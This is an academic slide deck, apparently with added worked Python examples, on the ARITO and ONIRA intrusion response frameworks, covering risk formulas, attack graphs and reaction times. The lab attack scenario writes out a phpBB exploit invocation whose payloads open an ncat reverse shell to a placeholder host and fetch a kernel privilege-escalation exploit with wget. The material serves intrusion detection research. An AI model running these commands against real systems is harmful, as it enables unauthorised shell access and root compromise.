System Health Monitoring and Proactive Response Activation
Alireza Shameli-Sendi
Michel Dagenais
December 6, 2012, École Polytechnique, Montreal
Content
Two Frameworks for IRS:
• ARITO: Cyber-Attack Response System Using Accurate Risk Impact Tolerance
• ONIRA: Online Intrusion Risk Assessment of Distributed Traces Using Dynamic Attack Graph
Achievement
Eclipse Framework:
– Prediction Algorithm
– Risk Assessment Algorithm
– Response System
• ORCEF – Static Risk Assessment
• ARITO – Improves ORCEF by adding online risk assessment
– There is not any relationship between services
• ONIRA – Improves ARITO by considering attack impact propagation in service dependency graph
[Timeline figure: Prediction → ORCEF (2010) → ARITO (2011) → ONIRA (2012); each framework improves the previous one's Risk Assessment and Response System]
ARITO: Cyber-Attack Response System Using Accurate Risk Impact Tolerance
ARITO Features
ARITO is an Intrusion Response System that consists of:
– a Risk Assessment module
– a Response Activation module
– a Response Deactivation module
– a Response Coordinator module, which measures the response goodness
Response System in ARITO
[Table of response properties]
Concept: Activation, Deactivation
Category: Instantaneous, Sustained reversible, Sustained irreversible
Attribute: Start time, Life time
How ARITO works
Scenario:
– Under the threshold and before the response is applied
– Above the threshold: the response coordinator selects an instantaneous response at first
– Under the threshold and after the responses have been applied: the risk is initialized to a level below the threshold (φ)
$RI_c = RI_p + RI_n$
Response Goodness
φ is dynamic, and is based on how successful the response was in repelling the attack
The best response goodness is 2, when we not only have success values in the current window, but also in all previous windows
Scenario:
$\varphi = T_a - \frac{T_a}{2} - \frac{RG}{G_{max} - G_{min}} \cdot T_a$
$Goodness_{w_k} = \dfrac{\sum_{i=1}^{n} S_i - \sum_{j=1}^{m} F_j}{\sum_{i=1}^{n} S_i + \sum_{j=1}^{m} F_j}$
$RG = \sum_{k=1}^{n} \dfrac{Goodness_{w_k}}{2^{k-1}}, \quad -2 < RG < +2$
Best $RG = 1 + \frac{1}{2} + \frac{1}{4} + \frac{1}{8} + \ldots \simeq 2$
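As an added worked example (not from the slides or the ARITO implementation), the response goodness RG and the new risk level φ computed from the formulas above; the per-window success/failure scores and the threshold value are constructed sample inputs.

```python
"""ARITO response goodness (RG) and new risk level (phi).  Added example.

Formulas as transcribed from the slides:
  Goodness_wk = (sum S_i - sum F_j) / (sum S_i + sum F_j)    per window k
  RG          = sum_k Goodness_wk / 2^(k-1)                   (-2 < RG < +2)
  phi         = T_a - T_a/2 - RG / (G_max - G_min) * T_a      (G_max = 2, G_min = -2)
"""
from typing import Sequence, Tuple

G_MAX, G_MIN = 2.0, -2.0   # bounds of RG given on the slide

Window = Tuple[Sequence[float], Sequence[float]]   # (success scores, failure scores)


def window_goodness(successes: Sequence[float], failures: Sequence[float]) -> float:
    """Normalised goodness of one observation window, in [-1, 1]."""
    s, f = sum(successes), sum(failures)
    if s + f == 0:           # nothing observed in the window: neutral
        return 0.0
    return (s - f) / (s + f)


def response_goodness(windows: Sequence[Window]) -> float:
    """RG over windows ordered most recent first (k = 1 is the current window).

    Window k is weighted 1/2^(k-1), so RG tends to 2 only when the current and
    all previous windows were full successes (1 + 1/2 + 1/4 + ...)."""
    return sum(window_goodness(s, f) / 2 ** k for k, (s, f) in enumerate(windows))


def new_risk_level(rg: float, threshold: float) -> float:
    """phi: level the risk index is reset to after responses have been applied.

    RG -> +2 resets the risk to about 0; RG -> -2 leaves it at the threshold T_a."""
    return threshold - threshold / 2 - rg / (G_MAX - G_MIN) * threshold


if __name__ == "__main__":
    # constructed sample: four windows of pure success, threshold T_a = 100
    history = [([1.0, 1.0], [])] * 4
    rg = response_goodness(history)                 # 1 + 1/2 + 1/4 + 1/8 = 1.875
    print(f"RG = {rg}, phi = {new_risk_level(rg, 100.0)}")
```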
Attack Scenario
The steps have been grouped into five phases:
– Probing
– Exploit phpBB2
– Upload exploit
– Exploit Linux kernel 2.6.37 to obtain root
– Install a permanent access
Abstracted Trace of Attack Scenario and Detection of Each Step
[Figure: trace events and the alert raised for each step]
A: web application scan
B: apache executes shell
C: shell executes ncat
D: ncat connects to remote host
E: ncat executes shell
F: shell executes wget
G: shell executes cc
H: shell executes exploit
M: exploit executes shell
N: shell executes adduser
K: shell is root
Results
[Figure: Risk Impact Tolerance over time, with the command, alert and response rows listed below; when $RI_C > T_a$ a response is activated and the risk is reset to the new level φ]
Commands:
C1: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "ncat -e /bin/sh x.x.x.x 9999"
C2: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "wget x.x.x.x/LPE.c -O /tmp/LPE.c"
C3: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "/tmp/LPE"
Alerts: A: web application scan; B: apache executes shell; C: shell executes ncat; D: ncat connects to remote host; E: ncat executes shell; F: shell executes wget; G: shell executes cc; H: shell executes exploit; M: exploit executes shell; N: shell executes adduser; K: shell is root
Responses:
R1: CLOSE_A_NET_CONNECTION
R2: KILL_PROCESS
R3: RESTART_DAEMON
R4: RESET(machine)
R5: NOT_ALLOWED_HOST(attacker IP)
R6: R_BLOCK_RECEIVER_PORT
ARITO Performance in Real-Time
The reaction delay time:
– Δt(detection) takes between 50 ms and 100 ms
– Risk assessment takes less than 6 ms
– The decision is made in less than 5 ms, so for R1 = R_CLOSE_A_NET_CONNECTION, reaction_delay(2) takes 81 ms
– The framework is fast enough to stop the attack in real-time
$reaction\_delay_i = \Delta t_{detection_i} + t_{risk_i} + t_{decision_i} + t_{response_i}$
$\Delta t_{detection_i} = t_{d_i} - t_i$
$reaction\_delay_i \simeq t_{response_i}$
Conclusion (ARITO)
ARITO proposes a perfect coordination between the risk assessment mechanism and the response system, which leads to an efficient framework that is able to:
– Prevent unnecessary responses
– Perform response activation and deactivation
– Consider the user needs in terms of QoS
ONIRA: Online Intrusion Risk Assessment of Distributed Traces Using Dynamic Attack Graph
ONIRA Features
– Presents multi-step attack detection from an LTTng trace using an attack graph
– Dynamic attack cost calculation based on the attack graph and the service dependency graph
– Calculation in the service dependency graph is based on impact propagation
Attack Modeling
The LAMBDA language (A Language to Model a Database for Detection of Attacks) is used for each state
Some attributes have been added to the LAMBDA language:
– Knowledge level
– CIA effects
Service Dependency Graph Modeling
For each service S three properties are defined: C(S), I(S), and A(S)
Two edges are available between each two services:
– Forward edge loss
– Backward edge loss
• Mandatory type dependency
– Not able to continue working
– Impact on Confidentiality
– Impact on Integrity
$Impact(S_i) = DirectImpact(S_i) + ForwardImpact(S_i) + BackwardImpact(S_i)$
Attack Cost Model
Parameters:
– Knowledge Level (κ)
– Attack frequency (θ)
– Effect on CIA (Δmax)
– Service value (ξ)
[Figure: attack graph (State1–State4) linked to the service dependency graph]
Attack Cost Model
Attack Cost: $\Psi = \alpha \times \kappa + \beta \times \theta + \gamma \times \xi + \delta \times \Delta_{max}$
Knowledge Level: $\kappa = \dfrac{\text{the number of skipped states}}{\text{the number of knowledge states}}$
Effect on CIA:
$\Delta C_{max} = \max x.ConfidentialityLoss$, $\Delta I_{max} = \max x.IntegrityLoss$, $\Delta A_{max} = \max x.AvailabilityLoss$, $\forall x \in$ executed steps in the attack graph
$\Delta_{max} = \dfrac{\Delta C_{max} + \Delta I_{max} + \Delta A_{max}}{3}$
Ranges: $\kappa \in [0, 1]$, $\theta \in [0, \infty)$, $\Delta_{max} \in [0, 1]$, $\xi \in [0, 1]$
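An added worked example of the attack cost calculation, not ONIRA's own code: the six-state attack graph and its KL flags follow the scenario on the slides, but the CIA loss values, the θ and ξ inputs and the α..δ weights are constructed assumptions.

```python
"""ONIRA attack cost Psi = alpha*kappa + beta*theta + gamma*xi + delta*Delta_max,
with kappa = skipped knowledge states / knowledge states and
Delta_max = (max ConfLoss + max IntegLoss + max AvailLoss) / 3 over executed steps.
Added example, not ONIRA's code."""
from dataclasses import dataclass
from typing import List

@dataclass(frozen=True)
class State:
    name: str
    knowledge: bool   # KL=Yes on the slide: a preparatory step a skilled intruder may skip
    c_loss: float     # ConfidentialityLoss, IntegrityLoss, AvailabilityLoss, each in [0, 1]
    i_loss: float
    a_loss: float

# Constructed attack graph: names and KL flags follow the slides' six-step scenario,
# the CIA loss values are assumed sample numbers.
ATTACK_GRAPH: List[State] = [
    State("probing", True,  0.1, 0.0, 0.0),
    State("ncat",    False, 0.4, 0.2, 0.0),
    State("wget",    True,  0.2, 0.1, 0.0),
    State("cc",      True,  0.0, 0.1, 0.0),
    State("exploit", False, 0.8, 0.8, 0.5),
    State("adduser", False, 0.9, 1.0, 0.3),
]

def knowledge_level(graph: List[State], executed: List[str]) -> float:
    """kappa: share of knowledge states skipped (higher means a more skilled intruder)."""
    knowledge = [s for s in graph if s.knowledge]
    if not knowledge:
        return 0.0
    return sum(1 for s in knowledge if s.name not in executed) / len(knowledge)

def cia_effect(graph: List[State], executed: List[str]) -> float:
    """Delta_max: mean of the worst C, I and A loss over the steps actually executed."""
    steps = [s for s in graph if s.name in executed]
    if not steps:
        return 0.0
    return (max(s.c_loss for s in steps) + max(s.i_loss for s in steps)
            + max(s.a_loss for s in steps)) / 3

def attack_cost(graph: List[State], executed: List[str], theta: float, xi: float,
                weights=(0.25, 0.25, 0.25, 0.25)) -> float:
    """Psi; theta (attack frequency, >= 0), xi (service value in [0, 1]) and the
    alpha..delta weights are assumed inputs, equal weights by default."""
    alpha, beta, gamma, delta = weights
    return (alpha * knowledge_level(graph, executed) + beta * theta
            + gamma * xi + delta * cia_effect(graph, executed))
```

With `executed=["ncat", "exploit", "adduser"]` (Scenario 2, t2: probing, wget and cc skipped) κ is 1.0 and Δmax is 0.8, so Ψ with equal weights, θ=1.0 and ξ=0.5 comes out at 0.825.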
ONIRA Architecture
Result (Attack Modeling)
[Figure: attack graph Start → Probing (KL=Yes) → ncat (KL=No) → wget (KL=Yes) → cc (KL=Yes) → exploit (KL=No) → AddUser (KL=No) → Response (KL=No) → End]
Trace events matched for the ncat step:
fs.exec: 18322, 18322, /bin/sh, , 12830, 0x0, SYSCALL { filename = "/bin/sh" }
fs.exec: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { filename = "/usr/bin/ncat" }
net.socket_connect: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { fd = 3, uservaddr = 0x80640a0, addrlen = 16, ret = -115 }
Command:
./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "ncat -e /bin/sh x.x.x.x 9999"
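Added example of matching the kernel events above to attack-graph steps C ("shell executes ncat") and D ("ncat connects to remote host"); this is not ONIRA's pattern matcher. The event field layout is an assumption read off the three trace lines, the set of shell images is assumed, and the sample trace is constructed from those lines.

```python
"""Matching LTTng kernel events to attack-graph steps C ("shell executes ncat") and
D ("ncat connects to remote host").  Added example, not ONIRA's pattern matcher.
Assumed event layout, read off the three trace lines on the slide:
  <event>: <pid>, <tid>, <exe>, <extra>, <ppid>, <flags>, <mode> { <payload> }"""
import re
from typing import Dict, List, Tuple

EVENT_RE = re.compile(
    r"^(?P<event>[\w.]+): (?P<pid>\d+), (?P<tid>\d+), (?P<exe>[^,]*), [^,]*, "
    r"(?P<ppid>\d+), \S+, \w+ \{ (?P<payload>.*) \}$")

# Constructed sample trace, copied from the three events shown on the slide.
SAMPLE_TRACE = """\
fs.exec: 18322, 18322, /bin/sh, , 12830, 0x0, SYSCALL { filename = "/bin/sh" }
fs.exec: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { filename = "/usr/bin/ncat" }
net.socket_connect: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { fd = 3, uservaddr = 0x80640a0, addrlen = 16, ret = -115 }
"""

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}   # assumed set of shell images


def parse_event(line: str) -> Dict[str, str]:
    """Split one trace line into its named fields; reject anything unrecognised."""
    m = EVENT_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised event line: {line!r}")
    return m.groupdict()


def match_steps(trace: str) -> List[Tuple[str, int]]:
    """Return (step, pid) for each attack-graph step observed in the trace.

    The exec'd image of every pid is remembered so that the parent of a later
    exec can be checked: step C needs ncat exec'd by a shell, step D needs a
    socket_connect issued by a process whose current image is ncat."""
    exe_of: Dict[int, str] = {}
    hits: List[Tuple[str, int]] = []
    for line in trace.splitlines():
        ev = parse_event(line)
        pid, ppid = int(ev["pid"]), int(ev["ppid"])
        if ev["event"] == "fs.exec":
            exe_of[pid] = ev["exe"]
            if ev["exe"].endswith("/ncat") and exe_of.get(ppid) in SHELLS:
                hits.append(("C: shell executes ncat", pid))
        elif ev["event"] == "net.socket_connect" and exe_of.get(pid, "").endswith("/ncat"):
            hits.append(("D: ncat connects to remote host", pid))
    return hits
```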
Result (Attack Modeling)
[Figure: same attack graph as on the previous slide, with the wget step highlighted]
Commands:
> ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "wget x.x.x.x/LPE.c -O /tmp/LPE.c"
> ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "ncat -e /bin/sh x.x.x.x 9999"
> wget x.x.x.x/LPE.c
Result (Framework)
ONIRA Framework in Eclipse
Results
Scenario 1: The intruder runs all steps of the multi-step attack even the second time
Scenario 2:
– t1: all steps
– t2: skips three states: probing, wget, and cc
Scenario 3:
– t1: skips two states: probing and cc
– t2: skips three states: probing, upload, and cc
– t3: runs all steps
ONIRA Performance in Real-Time
– The total cost of generating trace events, reading events, and pattern matching takes about 60 ms for this multi-step attack scenario
– For this trace, generated at a rate of 385 KB/s, storing the state information in the SHD takes 70 ms
– Retrieving information from the SHD takes 60 ms
– Checking the preconditions of five states takes 200 ms
– The risk assessment component takes less than 10 ms
– The decision is made in less than 3 ms
– In the worst case, the ONIRA framework takes 343 ms
Conclusion (ONIRA)
– ONIRA proposes a framework to calculate attack cost using a dynamic attack graph in live mode, based on kernel-level events
– ONIRA benefits from the service dependency graph to compute damage cost based on three concepts: direct impact, forward impact, and backward impact
– ONIRA calculates an accurate attack cost based on information provided by the service dependency and attack graphs
System Health Monitoring and Proactive Response Activation
www.lttng.org
Thank You
DORSAL
E-Mail: